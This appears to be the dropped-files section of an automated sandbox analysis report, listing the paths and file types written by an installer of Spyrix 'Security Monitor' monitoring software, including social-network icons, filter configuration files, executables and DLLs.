C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1FFV7.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2P74D.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-4PCT5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-5UTJ2.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-61H5U.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-62KR8.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-79SIE.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-C8SQH.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CO8KR.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-D2CD5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-IHOV2.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LMU5U.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LPTRG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-M94JL.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-MOF9G.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-NBAFM.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-NF1DG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-OA0RJ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PBDSP.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-Q9CC4.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-S9N3N.tmp
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UMLKQ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-UN8L1.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VG8HL.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-5VF8C.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-7QJJ3.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-EV84R.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-I55C6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-JQ74U.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-SATEB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-15P39.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-21EO6.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-IKQ7D.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-LGHO3.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0FLQ6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-17G87.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1A72T.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1MKF6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-4AD6P.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-4KPTH.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-5SAC9.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-8BHRF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-8CTU4.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ATSIL.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-ERNNR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FRQB7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-IVL6J.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-K2SLJ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-M0D24.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-O1D76.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-Q2FK3.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-VC4DR.tmp
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-DP90R.tmp
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-IAQ3P.tmp
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-KSHIB.tmp
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-E95CV.tmp
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-UOAON.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-M1G1D.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-133PP.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-AO39N.tmp
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-SUR0N.tmp
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1I5NJ.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-24VMR.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3CHVB.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-67IFD.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-6RR4V.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-719F1.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-7GR0S.tmp
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-7P6I2.tmp
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9U2JI.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BAID0.tmp
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DIATA.tmp
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DLB82.tmp
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-E4AAL.tmp
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-G06CG.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-GD8FS.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-H780M.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HNNTE.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JLPKJ.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JVHDE.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-LIV1O.tmp
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-NNSLF.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PIGO0.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-Q3LI9.tmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-TEJTU.tmp
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
